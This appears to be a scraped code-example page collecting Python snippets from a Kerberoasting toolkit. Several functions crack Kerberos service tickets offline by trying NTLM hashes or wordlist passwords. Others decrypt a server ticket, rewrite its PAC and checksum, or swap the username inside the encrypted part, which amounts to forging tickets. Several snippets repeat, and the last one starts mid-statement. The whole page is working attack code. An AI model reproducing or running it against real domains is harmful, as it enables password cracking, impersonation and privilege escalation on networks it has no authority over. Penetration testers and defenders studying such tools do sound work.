Esempio n. 1
0
def getpac(key, rawticket, debug=False, verbose=False):
	# attempt decoding of ticket
	try:
		ramticket, extra = decoder.decode(rawticket)
		serverticket = ramticket.getComponentByPosition(2)
		localticket = ramticket.getComponentByPosition(3)
		encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
	except:
		raise ValueError('Unable to decode ticket. Invalid file.')
	if verbose: print 'Ticket succesfully decoded'

	decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)

	if decserverticketraw == None:
		raise ValueError('Unable to decrypt ticket. Invalid key.')
	elif verbose:
		print 'Decryption successful'

	
	decserverticket, extra = decoder.decode(decserverticketraw)
	# have two here because I was using one to verify that the rewrite matched
	# This stuff should be removed, if it is still here Tim forgot...again
	origdecserverticket, extra = decoder.decode(decserverticketraw)

	# change the validity times in the server ticket
	updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))

	adifrelevant, extra = decoder.decode(decserverticket[9][0][1])
	pac = str(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))

	return pac
Esempio n. 2
0
def crackTicket(ticket, label, hashList):
	try:
		data = base64.b64decode(ticket)
	except:
		#print "DEBUG\n" + str(ticket) + "DEBUG\n\n"
		return "FAIL" + str(label) + "\n"
	
	manager = Manager()
	enctickets = manager.list()

	if data[0] == '\x76':
		try:
			enctickets.append((str(decoder.decode(data)[0][2][0][3][2])))
		except:
			#print "DEBUG\n" + str(ticket) + "DEBUG\n\n"
			return "FAIL" + str(label)
	elif data[:2] == '6d':
		for ticket in data.strip().split('\n'):
			try:
				enctickets.append((str(decoder.decode(ticket.decode('hex'))[0][4][3][2])))
			except:
				#print "DEBUG\n" + str(ticket) + "DEBUG\n\n"
				return "FAIL" + str(label)

	print "\nAccount: " + label

	for currentHash in hashList:
		ntlmHash_hex = binascii.unhexlify(currentHash)
		kdata, nonce = kerberos.decrypt(ntlmHash_hex, 2, enctickets[0])
		if kdata:
			print "NTLM Hash: " + currentHash
			break

	return ""
Esempio n. 3
0
def crackTicket(ticket, label, hashList):
    try:
        data = base64.b64decode(ticket)
    except:
        #print "DEBUG\n" + str(ticket) + "DEBUG\n\n"
        return "FAIL" + str(label) + "\n"

    manager = Manager()
    enctickets = manager.list()

    if data[0] == '\x76':
        try:
            enctickets.append((str(decoder.decode(data)[0][2][0][3][2])))
        except:
            #print "DEBUG\n" + str(ticket) + "DEBUG\n\n"
            return "FAIL" + str(label)
    elif data[:2] == '6d':
        for ticket in data.strip().split('\n'):
            try:
                enctickets.append(
                    (str(decoder.decode(ticket.decode('hex'))[0][4][3][2])))
            except:
                #print "DEBUG\n" + str(ticket) + "DEBUG\n\n"
                return "FAIL" + str(label)

    print "\nAccount: " + label

    for currentHash in hashList:
        ntlmHash_hex = binascii.unhexlify(currentHash)
        kdata, nonce = kerberos.decrypt(ntlmHash_hex, 2, enctickets[0])
        if kdata:
            print "NTLM Hash: " + currentHash
            break

    return ""
def crack(wordlist, enctickets):
    toremove = []
    while enctickets:
        try:
            word = wordlist.get()
            if word == 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE':
                break
            print "\ntrying %s" % word.encode('utf-8').decode(
                'utf-8-sig').strip()
            for et in enctickets:
                kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2,
                                                et[0])
                if kdata:
                    print 'found password for ticket %i: %s  File: %s' % (
                        et[1], word, et[2])
                    toremove.append(et)
                # if len(et):
                # print str(et[0])
            for et in toremove:
                try:
                    enctickets.remove(et)
                except:
                    return
                if not enctickets:
                    return
        except:
            continue
Esempio n. 5
0
def updatepac(key, rawticket, pac, debug=False, verbose=False):
	# attempt decoding of ticket
	try:
		ramticket, extra = decoder.decode(rawticket)
		serverticket = ramticket.getComponentByPosition(2)
		localticket = ramticket.getComponentByPosition(3)
		encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
	except:
		raise ValueError('Unable to decode ticket. Invalid file.')
	if verbose: print 'Ticket succesfully decoded'

	decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)

	if decserverticketraw == None:
		raise ValueError('Unable to decrypt ticket. Invalid key.')
	elif verbose:
		print 'Decryption successful'

	
	decserverticket, extra = decoder.decode(decserverticketraw)

	#for i in range(len(decserverticket[3])):
	#	print '---%i---' % i
	#	print decserverticket[3][i]

	# have two here because I was using one to verify that the rewrite matched
	# This stuff should be removed, if it is still here Tim forgot...again
	origdecserverticket, extra = decoder.decode(decserverticketraw)

	# change the validity times in the server ticket
	updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))

	adifrelevant, extra = decoder.decode(decserverticket[9][0][1])


	chksum = kerberos.chksum(key, '\x11\x00\x00\x00', pac)
	#print 'newchecksum:  %s' %  chksum.encode('hex')

	# repair server checksum
	newpac = pac[:-44] + chksum + pac[-28:]
	# rebuild AD-IF-RELEVANT
	#print adifrelevant
	#print dir(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))
	adifrelevant.getComponentByPosition(0).getComponentByPosition(1)._value = newpac
	#print adifrelevant
	decserverticket.getComponentByPosition(9).getComponentByPosition(0).getComponentByPosition(1)._value = encoder.encode(adifrelevant)


	# put the ticket back together again
	newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
	ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket

	#print decserverticket

	return encoder.encode(ramticket)
Esempio n. 6
0
def crack(wordlist, enctickets):
    toremove = []
    while enctickets:
        word = wordlist.get()
        #print "trying %s" % word
        for et in enctickets:
            kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0])
            if kdata:
                print('found password for ticket %i: %s  File: %s' %
                      (et[1], word, et[2]))
                toremove.append(et)
        for et in toremove:
            try:
                enctickets.remove(et)
            except:
                return
            if not enctickets:
                return
Esempio n. 7
0
def crack(wordlist, enctickets):
	toremove = []
	while enctickets:
		word = wordlist.get()
		if word == 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE':
			break
		#print "trying %s" % word
		for et in enctickets:
			kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0])
			if kdata:
				print 'found password for ticket %i: %s  File: %s' % (et[1], word, et[2])
				toremove.append(et)
		for et in toremove:
			try:
				enctickets.remove(et)
			except:
				return
			if not enctickets:
				return
Esempio n. 8
0
def updateusernameinencpart(key, rawticket, username, debug=False, verbose=False):
	try:
		ramticket, extra = decoder.decode(rawticket)
		serverticket = ramticket.getComponentByPosition(2)
		localticket = ramticket.getComponentByPosition(3)
		encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
	except:
		raise ValueError('Unable to decode ticket. Invalid file.')
	if verbose: print 'Ticket succesfully decoded'

	decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)

	a = decoder.decode(decserverticketraw)[0]
	a[3][1][0]._value = username
	e = encoder.encode(a)


	newencserverticket = kerberos.encrypt(key, 2, e, nonce)


	ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket


	return ramticket
Esempio n. 9
0
                ((decoder.decode(data)[0][2][0][3][2]).asOctets(), i, f))
            i += 1
        elif data[:2] == '6d':
            for ticket in data.strip().split('\n'):
                enctickets.append(((decoder.decode(
                    ticket.decode('hex'))[0][4][3][2]).asOctets(), i, f))
                i += 1

if len(enctickets):
    print("Cracking %i tickets..." % len(enctickets))
else:
    print("No tickets found")
    sys.exit()

# load wordlist
for w in args.wordlistfile:
    word = w.decode('utf-8').strip()
    hash = kerberos.ntlmhash(word)
    for et in enctickets:
        kdata, nonce = kerberos.decrypt(hash, 2, et[0])
        if kdata:
            print('found password for ticket %i: %s  File: %s' %
                  (et[1], word, et[2]))
            enctickets.remove(et)
            if len(enctickets) == 0:
                print('Successfully cracked all tickets')
                sys.exit()

if len(enctickets):
    print("Unable to crack %i tickets" % len(enctickets))